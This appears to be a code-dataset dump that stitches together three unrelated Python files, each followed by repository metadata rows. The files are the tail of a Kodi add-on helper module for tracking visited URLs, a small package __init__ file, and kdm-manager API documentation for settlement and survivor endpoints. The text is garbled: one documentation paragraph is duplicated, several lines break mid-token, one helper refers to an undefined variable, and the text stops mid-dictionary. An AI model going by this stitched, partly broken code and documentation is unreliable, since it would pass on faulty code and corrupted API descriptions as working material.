elif '.wmv' in url: ext='.wmv'
elif '.mp3' in url: ext='.mp3' #others
elif '.txt' in url: ext='.txt'
#else: ext='.flv' #Default File Extention ('.flv')
return ext
### ############################################################################################################
### ############################################################################################################
def visited_DoCheck(urlToCheck,s='[B][COLOR yellowgreen]@[/COLOR][/B] ',e='[COLOR black]@[/COLOR] '):
#visited_empty()
#return ''
vc=visited_check(urlToCheck)
if (vc==True): return s
else:
##visited_add(urlToCheck)
return e
def visited_check(urlToCheck):
try: saved_visits = cache.get('visited_')
except: return False
erNoFavs='XBMC.Notification([B][COLOR orange]Favorites[/COLOR][/B],[B]You have no favorites saved.[/B],5000,"")'
if not saved_visits: return False #xbmc.executebuiltin(erNoFavs)
if saved_visits == '[]': return False #xbmc.executebuiltin(erNoFavs)
if saved_visits:
visits = eval(saved_visits)
if (urlToCheck in visits): return True
return False
def visited_check2(urlToCheck):
try: saved_visits = cache.get('visited_')
except: return False
erNoFavs='XBMC.Notification([B][COLOR orange]Favorites[/COLOR][/B],[B]You have no favorites saved.[/B],5000,"")'
if not saved_visits: return False #xbmc.executebuiltin(erNoFavs)
if saved_visits == '[]': return False #xbmc.executebuiltin(erNoFavs)
if saved_visits:
visits = eval(saved_visits)
if visits:
for (title) in visits:
if (urlToCheck in title): return True
return False
def visited_empty():
saved_favs = cache.get('visited_')
favs = []
cache.set('visited_', str(favs))
notification('[B][COLOR orange]Visited[/COLOR][/B]','[B] Your Visited Data has been wiped clean. Bye Bye.[/B]')
def visited_remove(urlToRemove):
saved_visits = cache.get('visited_')
visits = []
if saved_visits:
visits = eval(saved_visits)
if visits:
#print visits; print urlToRemove
for (title) in visits:
if (urlToRemove==title):
visits.remove((urlToRemove));
cache.set('visited_', str(visits))
#RefreshList();
return
##########
##if saved_favs:
## favs=eval(saved_favs)
## if favs:
## for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
## if (name==_name) and (year==_year): favs.remove((_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2)); cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); tf=True; myNote(bFL(name.upper()+' ('+year+')'),bFL('Removed from Favorites')); deb(name+' ('+year+')','Removed from Favorites. (Hopefully)'); xbmc.executebuiltin("XBMC.Container.Refresh"); return
## if (tf==False): myNote(bFL(name.upper()),bFL('not found in your Favorites'))
## else: myNote(bFL(name.upper()+' ('+year+')'),bFL('not found in your Favorites'))
def visited_add(urlToAdd):
if (urlToAdd==''): return ''
elif (urlToAdd==None): return ''
deb('checking rather url has been visited',urlToAdd)
saved_visits = cache.get('visited_')
visits = []
if saved_visits:
#deb('saved visits',saved_visits)
visits = eval(saved_visits)
if visits:
if (urlToAdd) in visits: return
visits.append((urlToAdd))
cache.set('visited_', str(visits))
def wwCMI(cMI,ww,t): #for Watched State ContextMenuItems
sRP='XBMC.RunPlugin(%s)'; site=addpr("site"); section=addpr("section");
if ww==7:
cMI.append(("Unmark",sRP % _addon.build_plugin_url({'mode':'RemoveVisit','title':t,'site':site,'section':section})))
cMI.append(("Empty Visits",sRP % _addon.build_plugin_url({'mode':'EmptyVisit','site':site,'section':section})))
elif ww==6:
cMI.append(("Mark",sRP % _addon.build_plugin_url({'mode':'AddVisit','title':t,'site':site,'section':section})))
return cMI
### ############################################################################################################
### ############################################################################################################
def refresh_meta(video_type,old_title,imdb,alt_id,year,new_title=''):
try: from metahandler import metahandlers
except: return
__metaget__=metahandlers.MetaData()
if new_title: search_title=new_title
else: search_title=old_title
if video_type=='tvshow':
api=metahandlers.TheTVDB(); results=api.get_matching_shows(search_title); search_meta=[]
for item in results: option={'tvdb_id':item[0],'title':item[1],'imdb_id':item[2],'year':year}; search_meta.append(option)
else: search_meta=__metaget__.search_movies(search_title)
debob(search_meta); #deb('search_meta',search_meta);
option_list=['Manual Search...']
for option in search_meta:
if 'year' in option: disptitle='%s (%s)' % (option['title'],option['year'])
else: disptitle=option['title']
option_list.append(disptitle)
dialog=xbmcgui.Dialog(); index=dialog.select('Choose',option_list)
if index==0: refresh_meta_manual(video_type,old_title,imdb,alt_id,year)
elif index > -1:
new_imdb_id=search_meta[index-1]['imdb_id']
#Temporary workaround for metahandlers problem:
#Error attempting to delete from cache table: no such column: year
if video_type=='tvshow': year=''
try: _1CH.log(search_meta[index-1])
except: pass
__metaget__.update_meta(video_type,old_title,imdb,year=year); xbmc.executebuiltin('Container.Refresh')
def refresh_meta_manual(video_type,old_title,imdb,alt_id,year):
keyboard=xbmc.Keyboard()
if year: disptitle='%s (%s)' % (old_title,year)
else: disptitle=old_title
keyboard.setHeading('Enter a title'); keyboard.setDefault(disptitle); keyboard.doModal()
if keyboard.isConfirmed():
search_string=keyboard.getText()
refresh_meta(video_type,old_title,imdb,alt_id,year,search_string)
### ############################################################################################################
### ############################################################################################################
def DoE(e): xbmc.executebuiltin(E)
def DoA(a): xbmc.executebuiltin("Action(%s)" % a)
### ############################################################################################################
### ############################################################################################################
| [
"ke.xiao@netxeon.com"
] | ke.xiao@netxeon.com |
ca2fa5ad4997c54d0f3874f400a20a3fbfbdaf02 | ccbe341f4bc5f46ce31968a1d764a87f6f6803a8 | /pytheas/__init__.py | 49bf2edb9ecbfe446b859aa5cdeb805ed037f51e | [
"MIT"
] | permissive | skytreader/pytheas | 8ce1e23965c61aff5eb48a301e9a8e04d3c70a55 | c41cf985827734a1a9be1e61a93fca2a7b14c3d9 | refs/heads/master | 2023-04-09T01:54:24.423483 | 2014-06-03T04:04:35 | 2014-06-03T04:04:35 | 17,976,330 | 0 | 0 | null | 2023-03-31T14:38:58 | 2014-03-21T10:30:38 | Python | UTF-8 | Python | false | false | 156 | py | # Copied from https://github.com/andymccurdy/redis-py/blob/master/redis/__init__.py
__version__ = "0.1.2"
VERSION = tuple(map(int, __version__.split(".")))
| [
"chadestioco@gmail.com"
] | chadestioco@gmail.com |
9bad8400dbafa3c00fcaf4ba4085dc262f62207b | 7b3743f052da9a74808b7d2145418ce5c3e1a477 | /v2/api.thewatcher.io/api/docs/private.py | 5f68768247fe15338ab8d818e23743055fb70ded | [
"MIT"
] | permissive | quebecsti/kdm-manager | 5547cbf8928d485c6449650dc77805877a67ee37 | a5fcda27d04135429e43a21ac655e6f6acc7768e | refs/heads/master | 2020-11-26T19:22:53.197651 | 2019-10-22T20:53:40 | 2019-10-22T20:53:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,331 | py | authorization_token_management = {
"authorization_check": {
"name": "/authorization/check",
"desc": """\
<p><b>GET</b> or <b>POST</b> to this endpoint to determine if your Authorization
header is still valid or if it has expired.</p>""",
},
"authorization_refresh": {
"name": "/authorization/refresh",
"desc": """\
<p> Use the standard 'Authorization' header and <b>POST</b> an empty request to
this route to recieve a new Auth token based on the previous one.</p>
<p> On the back end, this route reads the incoming 'Authorization' header and,
even if the JWT token is expired, will check the 'login' and 'password' (hash)
keys: if they check out, you get a 200 and a brand new token.</p>
<p> Finally, the KDM API does NOT use refresh tokens (it just feels like
overkill, you know?).</p>\
"""
},
}
administrative_views_and_data = {
"admin_view_panel": {
"name": "/admin/view/panel",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Access the API Admin panel. Uses HTTP basic auth (no cookies/no sessions)
and requires a user have the 'admin' bit flipped on their user.</p>
""",
},
"admin_get_user_data": {
"name": "/admin/get/user_data",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Retrieves a nice, juicy hunk of JSON re: recent users of the API.</p>
""",
},
"admin_get_logs": {
"name": "/admin/get/logs",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Dumps the contents of a number of system logs from the local filesystem where
the API is running and represents them as JSON.</p>
""",
},
}
user_management = {
"user_get": {
"name": "/user/get/<user_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Retrieve a serialized version of the user who owns <user_id>,
to include some additional usage and meta facts about that user.</p>
<p>Like many of the <code><b>GET</b></code> routes supported by the KD:M API,
this route will return user info whether you use <code><b>POST</b></code> or
any other supported method.</p>
""",
},
"user_dashboard": {
"name": "/user/dashboard/<user_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>This fetches a serialized version of the user that includes the
<code>/world</code> output as well as a bunch of info about the
user, including their friends, settlements they own or are
playing in, etc.</p>
<p>Here's a run-down of the key elements:</p>
<pre><code>{
"is_application_admin": true,
"meta": {...},
"user": {...},
"preferences": [...],
"dashboard": {
"campaigns": [...],
"settlements": [...],
},
}</code></pre>
<p>The top-level <code>dashboard</code> element includes two arrays:
<code>campaigns</code> and <code>settlements</code>.</p>
<p>The <code>campaigns</code> array is a <b>reverse-chronological</b> list
of OIDs of all settlements where the user owns a survivor (i.e.
the survivor's <code>email</code> attribute matches the users
<code>login</code> attribute.</p>
<p>This list can include settlements owned/created by other users:
the basic idea behing the <code>campaigns</code> list is that
you probably want to show these settlements to the user when they
sign in or when they choose which settlement they want to view.</p>
<p>The <code>campaigns</code> array <u>does not</u> include any
'abandoned' settlements (i.e. any settlement with a Boolean True
value for the <code>abandoned</code> attribute.</p>
<p>See <a href="/#settlementAbandon"><code>/settlement/abandon/oid</code>
(below)</a> for more on abandoning a settlement. </p>
<p>Conrastively, the <code>settlements</code> array is a
<b>chronologically</b> sorted list of all settlement OIDs that belong
to the current user, whether abandoned or not.</p>
<p>This is more of an archival/historical sort of list, meant to
facilitate that kind of view/list/UX.</p>
""",
},
"user_set": {
"name": "/user/set/<user_id>",
"subsection": "user_attribute_management",
"desc": """\
<p>This route supports the assignment of user-specified key/value
attributes to the user object.</p><p>To set an attribute, include
JSON in the body of the request that indicates the key/value to set.</p>
Supported attribute keys include:
<table class="embedded_table">
<tr><th>key</th><th>value</th></tr>
<tr>
<td>current_settlement</td>
<td class="text">
OID of an existing,non-removed settlement.
</td>
</tr>
</table>
Use multiple key/value pairs to set multiple attributes in a single
request, e.g. <code>{"current_settlement": $oid, "current_session":
$oid}</code>
</p>
<p><b>Important!</b> This route does not support the assignment of
arbitrary keys and will completely fail any request that includes
unsupported keys!</p>
""",
},
"user_set_preferences": {
"name": "/user/set_preferences/<user_id>",
"subsection": "user_attribute_management",
"desc": """\
<p><b>POST</b> a list of hashes to this endpoint to set user preferences.</p>
<p>Your list has to be named <code>preferences</code> and your
hashes have to be key/value pairs where they key is a valid
preferences handle and the key is a Boolean:</p>
<code>{preferences: [{handle: "beta", value: true}, {...}]}</code>
<p>Since this is mostly a sysadmin/back-of-house kind of route,
it fails pretty easily if you try to <b>POST</b> something it doesn't
like. The good news, is that it should fail pretty descriptively.</p>
""",
},
"user_add_expansion_to_collection": {
"name": "/user/add_expansion_to_collection/<user_id>",
"subsection": "user_collection_management",
"desc": """\
<p>You can <b>POST</b> a single expansion handle to this endpoint
to add it to a user's collection of expansions:</p>
<code>{handle: "manhunter"}</code>
""",
},
"user_rm_expansion_from_collection": {
"name": "/user/rm_expansion_from_collection/<user_id>",
"subsection": "user_collection_management",
"desc": """\
<p><b>POST</b> some basic JSON to this endpoint to remove an expansion handle
from a user's collection:</p>
<code>{handle: "flower_knight"}</code>
""",
},
}
create_assets = {
"new_settlement": {
"name": "/new/settlement",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>Use 'handle' values from the <code>/game_asset/new_settlement</code>
route (see above) as params, like this:</p>
<code><pre>{
"campaign": "people_of_the_lantern",
"expansions": ["dung_beetle_knight", "lion_god"],
"survivors": ["adam", "anna"],
"name": "Chicago",
"special": ["create_first_story_survivors"]
}</pre></code>
<p>If successful, this route returns a serialized version of the new settlement,
including its OID, as JSON.</p>
<p>The following <code>special</code> values are supported by the API:</p>
<table class="embedded_table">
<tr><th>value</th><th>result</th></tr>
<tr>
<td class="key">create_first_story_survivors</td>
<td class="value">Creates two male and two female survivors,
assigns them names and places Founding Stones and Cloths in
Settlement Storage.</td>
</tr>
<tr>
<td class="key">create_seven_swordsmen</td>
<td class="value">Creates seven random survivors with the
'Ageless' and Sword Mastery A&Is. </td>
</tr>
</table>
<p><b>Important!</b> Unsupported <code>special</code> values are ignored.</p>\
""",
},
"new_survivor": {
"name": "/new/survivor",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>This works differently from <code>/new/settlement</code> in
a number of significant ways.</p>
<p> In a nutshell, the basic idea here is that the only required key
in the JSON you <b>POST</b> to this route is an object ID for the settlement
to which the survivor belongs:</p>
<code>{'settlement': '59669ace4af5ca799c968c94'}</code>
<p> Beyond that, you are free to supply any other attributes of the
survivor, so long as they comply with the data model for survivors.</p>
<p> Consult the <a href="/#survivorDataModel">Survivor Data Model (below)</a> for a
complete reference on what attributes of the survivor may be set at
creation time.</p>
<p>As a general piece of advice, it typically makes more sense to
just initialize a new survivor with defaults and then operate on it
using the routes below, unless you're doing something inheritance.</p>
<p>For normal inheritance, simply <b>POST</b> the OID's of one or
more of the survivor's parents like so:</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff'}</code>
<p>...or like so:</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5ca11240f519f'}</code>
<p>This will cause normal inheritance rules to be triggered when the
new survivor is created.</p>
<p>In order to trigger conditional or special inheritance, e.g. where
an innovation requires the user to select a single parent as the donor,
you <u>must</u> specify which parent is the donor using the <code>
primary_donor_parent</code> key and setting it to 'father' or 'mother':</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5c
a11240f519f', primary_donor_parent: 'father'}</code>
<p>This will cause normal inheritance rules to be triggered when the
new survivor is created.</p>
<p>In order to trigger conditional or special inheritance, e.g. where
an innovation requires the user to select a single parent as the donor,
you <u>must</u> specify which parent is the donor using the <code>
primary_donor_parent</code> key and setting it to 'father' or 'mother':</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5ca11240f519f', primary_donor_parent: 'father'}</code>
<p>This will cause innovations such as <b>Family</b> to use the primary
donor parent to follow one-parent inheritance rules for that innovation.</p>
<p>As of API releases > 0.77.n, survivors can be created with an avatar.
Inclde the <code>avatar</code> key in the <b>POST</b> body, and let
that key's value be a string representation of the image that should
be used as the survivor's avatar.</p>
<p>(<a href="/#setAvatarAnchor">See <code>/survivor/set_avatar/<oid></code> route below</a> for more
information on how to post string representations of binary content.</p>
<p><b>Important!</b>Just like the <code>/new/settlement</code> route,
a successful <b>POST</b> to the <code>/new/survivor</code> route will return
a serialized version (i.e. JSON) of the new survivor, complete with
the <code>sheet</code> element, etc.</p>
""",
},
"new_survivors": {
"name": "/new/survivors",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>Not to be confused with <code>/new/survivor</code> (above),
this route adds multiple new survivors, rather than just one.</p>
<p>The JSON you have to <b>POST</b> to this route is a little different
and more limited than what you would post to <code>/new/survivor</code>.</p>
<p>The following <b>POST</b> key/value pairs are the only ones supported
by this route:</p>
<table class="embedded_table">
<tr><th>key</th><th>O/R</th><th>value type</th><th>comment</th>
<tr>
<td>settlement_id</td>
<td><b>R</b></td>
<td>settlement OID</td>
<td class="text">The OID of the settlement to which the new survivors belong.</td>
</tr>
<tr>
<td>public</td>
<td>O</td>
<td>boolean</td>
<td class="text">
The value of the new survivors'<code>public</code> attribute.
Defaults to <code>true</code>.
</td>
</tr>
<tr>
<td>male</td>
<td>O</td>
<td>arbitrary int</td>
<td class="text">The number of male survivors to create.</td>
</tr>
<tr>
<td>female</td>
<td>O</td>
<td>arbitrary int</td>
<td class="text">The number of female survivors to create.</td>
</tr>
<tr>
<td>father</td>
<td>O</td>
<td>survivor OID</td>
<td class="text">The OID of the survivor that should be the father of the new survivors.</td>
</tr>
<tr>
<td>mother</td>
<td>O</td>
<td>survivor OID</td>
<td class="text">The OID of the survivor that should be the mother of the new survivors.</td>
</tr>
</table>
<p>Creating new survivors this way is very simple. This JSON, for
example, would create two new male survivors:</p>
<code>{"male": 2, "settlement_id": "5a1485164af5ca67035bea03"}</code>
<p>A successful <b>POST</b> to this route always returns a list of
serialized survivors (i.e. the ones that were created), so if
you are creating more than four or five survivors, this route is
a.) going to take a couple/few seconds to come back to you and b.)
is going to drop a pile of JSON on your head. YHBW.</p>
<p>NB: this route <i>does not</i> support random sex assignment.</p>
""",
},
}
settlement_management = {
"settlement_get_settlement_id": {
"name": "/settlement/get/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p> Retrieve a serialized version of the settlement associated
with <settlement_id> (to include all related user and game
assets, including survivors).</p>
<p><b>Important!</b> Depending on the number of expansions, survivors,
users, etc. involved in a settlement/campaign, this one can take a
long time to come back (over 2.5 seconds on Production hardware).
YHBW</p>
""",
},
"settlement_get_summary_settlement_id": {
"name": "/settlement/get_summary/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Get a nice, dashboard-friendly summary of a settlement's info.</p>
<p>This route is optimized for speedy returns, e.g. the kind you want when
showing a user a list of their settlements.</p>
""",
},
"settlement_get_campaign_settlement_id": {
"name": "/settlement/get_campaign/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Retrieve a serialized version of the settlement where the
<code>user_assets</code> element includes the <code>groups</code>
list, among other things, and is intended to be used in creating
'campaign' type views.</p>
<p>Much like the big <code>get</code> route for settlements, this one
can take a while to come back, e.g. two or more seconds for a normal
settlement. YHBW.</p>
""",
},
"settlement_get_sheet_settlement_id": {
"name": "/settlement/get_sheet/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>A convenience endpoint that only returns the settlement's <code>sheet</code>
element, i.e. the dictionary of assets it owns.</p>
""",
},
"settlement_get_game_assets_settlement_id": {
"name": "/settlement/get_game_assets/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>A convenience endpoint that only returns the serialized settlement's <code>
game_assets</code> element, i.e. the JSON representation of the game assets
(gear, events, locations, etc.) required to represent the settlement. </p>
""",
},
"settlement_get_event_log_settlement_id": {
"name": "/settlement/get_event_log/<settlement_id>",
"subsection": "settlement_component_gets",
"desc": """\
<p><b>GET</b> this end point to retrieve all settlement event log
entries (in a giant hunk of JSON) in <u>reverse chronological
order</u>, i.e. latest first, oldest last.</p>
<p>PROTIP: For higher LY settlements this can be a really huge
list and take a long time to return: if you're a front-end
developer, definitely consider loading this one AFTER you have
rendered the rest of your view.</p>
<p>Another way to optimize here is to include a filter key/value
pair in your <b>POST</b> body to limit your results. Some of the
accepted filter params will decrease the time it takes for your
requested lines to come back from the API:
<table class="embedded_table">
<tr><th>key</th><th>value type</th><th>scope</th>
<tr>
<td>lines</td>
<td>arbitrary int</td>
<td class="text">Limit the return to the last <code>lines</code>-worth of lines: <code>{lines: 1
0}</code>. Note that this <u>does not</u> make the query or the return time better or faster for settlements with large event logs.</td>
</tr>
<tr>
<td>ly</td>
<td>arbitrary int</td>
<td class="text">
Limit the return to event log lines created <u>during</u> an arbitrary Lantern Year, e.g. <code>{ly: 9}</code>.<br/>
Note:
<ul class="embedded">
<li>This will always return <i>something</i> and you'll get an empty list back for Lantern Years with no events.</li>
<li>This param triggers a performance-optimized query and will return faster than a general call to the endpoint with no params.</li>
</ul>
</tr>
<tr>
<td>get_lines_after</td>
<td>event log OID</td>
<td class="text">Limit the return to event log lines created <u>after</u> an event log OID: <cod
e>{get_lines_after: "5a0370b54af5ca4306829050"}</code></td>
</tr>
<tr>
<td>survivor_id</td>
<td>arbitrary survivor's OID</td>
<td class="text">Limit the return to event log lines that are tagged with a survivor OID: <code>
{survivor_id: "5a0123b54af1ca42945716283"}</code></td>
</tr>
</table>
<p><b>Important!</b> Though the API will accept multiple filter
params at this endpoint, <b>POST</b>ing more than one of the
above can cause...unexpected output. YHBW.</p>
""",
},
"settlement_get_storage_settlement_id": {
"name": " /settlement/get_storage/<settlement_id>",
"methods": ['GET','OPTIONS'],
"subsection": "settlement_component_gets",
"desc": """\
<p>Hit this route to get representations of the settlement's storage.</p>
<p>What you get back is an array with two dictionaries, one for resources
and one for gear:</p>
<pre><code>[
{
"storage_type": "resources",
"total":0,
"name":"Resource",
"locations": [
{
"bgcolor":"B1FB17",
"handle":"basic_resources",
"name":"Basic Resources",
"collection": [
{
"handle":"_question_marks",
"name":"???",
"rules":[],
"consumable_keywords": ["fish","consumable","flower"],
"type_pretty": "Resources",
"keywords": ["organ","hide","bone","consumable"],
"desc":"You have no idea what monster bit this is. Can be used as a bone, organ, or hide!",
"type":"resources",
"sub_type":"basic_resources",
"quantity":0,"flippers":false
},
...
],
...
},
},
], </pre></code>
<p>This JSON is optimized for representation via AngularJS, i.e. iteration over
nested lists, etc.</p>
<p>Each dictionary in the main array has an array called <code>locations</code>,
which is a list of dictionaries where each dict represents a location within the
settlement.</p>
<p>Each location dictionary has an array called <code>collection</code> which is
a list of dictionaries where each dictionary is a piece of gear or a resource.</p>
<p>The attributes of the dictionaries within the <code>collection</code> array
include the <code>desc</code>, <code>quantity</code>, etc. of an individual
game asset (piece of gear or resource or whatever).</p>
""",
},
"settlement_abandon_settlement_id": {
"name": "/settlement/abandon/<settlement_id>",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>Hit this route with a <b>POST</b> to mark the settlement as abandoned.</p>
<p>Your <b>POST</b> does not need to contain anything (but it does need
to be a <b>POST</b> (<b>GET</b> requests will not abandon the settlement.</p>
<p>An abandoned settlement has a date/time stamp of when it was
abandoned as its <code>abandoned</code> attribute and you can use this in your
UI to separate it out from active settlements.</p>
""",
},
"settlement_remove_settlement_id": {
"name": "/settlement/remove/<settlement_id>",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p><b>POST</b> (not <b>GET</b>) to this route to mark the settlement as
removed.</p>
<p>Once marked as removed, settlements are queued up by the API for removal
from the database: the next time the maintenance process runs, it will check
the timestap of the mark as removed event and purge the settlement
(and all survivors) from the database.</p>
<p><b>This cannot be undone.</b></p>
""",
},
#
# settlement SET attributes
#
"settlement_set_last_accessed_settlement_id": {
"name": "/settlement/set_last_accessed/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>This endpoint allows you to set the settlement's <code>last_accessed</code>
attribute, which is used in dashboard reporting, etc. </p>
<p><b>POST</b>ing an empty JSON payload to this will cause the settlement's
<code>last_accessed</code> value to be set to now.</p>
""",
},
"settlement_set_name_settlement_id": {
"name": "/settlement/set_name/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p><b>POST</b> some JSON whose body contains the key 'name' and whatever the
new name is going to be as that key's value to change the settlement's
name:</p>
<code>{'name': 'The Black Lantern'}</code>
<p><b>Important!</b> Submitting an empty string will cause the API to
default the settlement's name to "UNKNOWN". There are no technical
reasons (e.g. limitations) for this, but it breaks the display in most
client apps, so null/empty names are forbidden.</p>
""",
},
"settlement_set_attribute_settlement_id": {
"name": "/settlement/set_attribute/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p><b>POST</b> some basic JSON containing an 'attribute' and a 'value'
key where 'attribute' is an integer settlement attrib and 'value' is
the new value:</p>
<code>{'attribute': 'survival_limit', 'value': 3}</code>
<p> This route also supports incrementing the <code>population</code>
and <code>death_count</code> attributes. </p>
""",
},
"settlement_set_inspirational_statue_settlement_id": {
"name": "/settlement/set_inspirational_statue/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Set the settlement's <code>inspirational_statue</code> attrib
by <b>POST</b>ing a Fighting Art handle to this route:</p>
<code>{'handle': 'leader'}</code>
<p>This route will actually check out the handle and barf on you
if you try to <b>POST</b> an unrecognized FA handle to it. YHBW.</p>
""",
},
"settlement_set_lantern_research_level_settlement_id": {
"name": "/settlement/set_lantern_research_level/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Set the Settlement's Lantern Research Level with some basic
JSON:</p>
<code>{'value': 3}</code>
<p>This route is preferably to a generic attribute setting route
becuase it a.) ignores values over 5 and b.) forces the attrib,
which is not part of the standard data motel, to exist if it does
not.</p>
<p>Definitely use this instead of <code>set_attribute</code>.</p>
""",
},
"settlement_update_set_lost_settlements_settlement_id": {
"name": "/settlement/set_lost_settlements/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Use this route to set a settlement's Lost Settlements total.</p>
<p><b>POST</b> some JSON containing the new value to set it to:</p>
<code>{"value": 2}</code>
<p>The above code would set the settlement's Lost Settlements total
to two; negative numbers will default to zero. </p>
""",
},
#
# settlement UPDATE attributes
#
"settlement_update_attribute_settlement_id": {
"name": "/settlement/update_attribute/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p><b>POST</b> some JSON containing an 'attribute' and a 'modifier'
key where 'attribute' is an integer settlement attrib and 'mofier' is
how much you want to increment it by:</p>
<code>{'attribute': 'death_count', 'modifier': -1}</code>
<p> This route also supports incrementing the <code>survival_limit
</code> and <code>death_count</code> routes.</p>
""",
},
"settlement_update_population_settlement_id": {
"name": "/settlement/update_population/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p><b>POST</b> some JSON containing the key 'modifier' whose value is
an integer that you want to add to the settlement's population
number.<p>
<p>This works basically identically to the <code>update_attribute</code>
route, so considering using that route instead. </p>
<p>For example, this JSON would add two to the settlement's
population number:</p>
<code>{'modifier': 2}</code>
<p><b>POST</b> negative numbers to decrease.</p>
<p><b>Important!</b> Settlement population can never go below zero,
so any 'modifier' values that would cause this simply cause the
total to become zero.</p>\
""",
},
"settlement_replace_game_assets_settlement_id": {
"name": "/settlement/replace_game_assets/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>This route functions nearly identically to the other update-type routes in
this subsection, except for one crucial difference: it works on list-type
attributes of the settlement (whereas the others mostly work on string or
integer type attributes).</p>
<p>This route accepts a list of <code>handles</code> and a <code>type</code>
of game asset and then evalutes the settlement's current handles of that type,
removing and adding as necessary in order to bring the settlement's list in sync
with the incoming list. </p>
<p>Your POST body needs to define the attribute <code>type</code>
you're trying to update, as well as provide a list of handles
that represent the settlement's current asset list:</p>
<pre><code>{
"type": "locations",
"handles": [
"lantern_hoard","bonesmith","organ_grinder"
]
}</code></pre>
<p>Finally, a couple of tips/warnings on this route:<ul>
<li>The <code>handles</code> list/array is handled by the API as if it were a set, i.e. duplicates are silently ignored.</li>
<li>If any part of the update fails (i.e. individual add or remove operations), the whole update will fail and <u>no changes to the settlement will be saved</u>.</li>
<li>This route does not support Location or Innovation levels! (Use <code>set_location_level</code> or <code>set_innovation_level</code> for that.)</li>
</ul></p>
""",
},
"settlement_update_endeavor_tokens_settlement_id": {
"name": "/settlement/update_endeavor_tokens/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>Use this route to change a settlement's endeavor token count.</p>
<p><b>POST</b> some JSON containing the number to modify by:</p>
<code>{"modifier": 2}</code>
<p>The above code would add two to the settlement's current total,
whereas the code below would decrement by one:</p>
<code>{"modifier": -1}</code>
""",
},
"settlement_update_toggle_strain_milestone_settlement_id": {
"name": "/settlement/toggle_strain_milestone/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>You may <b>POST</b> some JSON containing the key <code>handle</code>
and the value of a strain milestone handle to toggle that strain
milestone on or off for the settlement:</p>
<code>{"handle": "ethereal_culture_strain"}</code>
<p>The API will fail if unknown <code>handle</code> values are <b>POST</b>ed.</p>
""",
},
#
# bulk survivor management
#
"settlement_update_survivors_settlement_id": {
"name": "/settlement/update_survivors/<settlement_id>",
"subsection": "settlement_manage_survivors",
"desc": """\
<p>Use this route to update a specific group of survivors, e.g.
Departing survivors.</p>
<p><b>POST</b> some JSON including the type of survivors to include,
the attribute to modify, and the modifier:</p>
<code>{include: 'departing', attribute: 'Insanity', modifier: 1}</code>
<p><b>Important!</b> This route currently only supports the
<code>include</code> value 'departing' and will error/fail/400 on
literally anything else.</p>\
""",
},
#
# settlement: manage expansions
#
"settlement_update_add_expansions_settlement_id": {
"name": "/settlement/add_expansions/<settlement_id>",
"subsection": "settlement_manage_expansions",
"desc": """\
<p>Add expansions to a settlement by <b>POST</b>ing a list of expansion handles.
The body of your post should be a JSON-style list:</p>
<code>{'expansions': ['beta_challenge_scenarios','dragon_king']}</code>
<p>
Note that this route not only updates the settlement sheet, but also
adds/removes timeline events, updates the settlement's available game
assets (e.g. items, locations, etc.).
</p>
""",
},
"settlement_update_rm_expansions_settlement_id": {
"name": "/settlement/rm_expansions/<settlement_id>",
"subsection": "settlement_manage_expansions",
"desc": """\
<p>Remove expansions from a settlement by <b>POST</b>ing a list of
expansion handles. The body of your post should be a JSON-style
list:</p>
<code>{'expansions': ['manhunter','gorm','spidicules']}</code>
<p>
Note that this route not only updates the settlement sheet, but also
adds/removes timeline events, updates the settlement's available game
assets (e.g. items, locations, etc.).
</p>
<p><b>Important!</b> We're all adults here, and the KDM API will
<i>not</i> stop you from removing expansion handles for expansions
that are required by your settlement's campaign. If you want to
prevent users from doing this, that's got to be part of your UI/UX
considerations.</p>
""",
},
#
# settlement: manage monsters
#
"settlement_set_current_quarry_settlement_id": {
"name": "/settlement/set_current_quarry/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p>This route sets the settlement's 'current_quarry' attribute,
which is the monster that the settlement's Departing Survivors are
currently hunting.</p><p><b>POST</b> some simple JSON containing a monster
name (do not use handles for this):</p>
<code>{'current_quarry': 'White Lion Lvl 2'}</code>
<p>...or, the monster is unique:</p>
<code>{'current_quarry': 'Watcher'}</code>
<p><b>Important!</b> You're typically going to want to pull monster
names from the settlements' <code>game_assets -> defeated_monsters</code>
list (which is a list of monster names created for the settlement
based on expansion content, etc.)</p>
""",
},
"settlement_add_defeated_monster_settlement_id": {
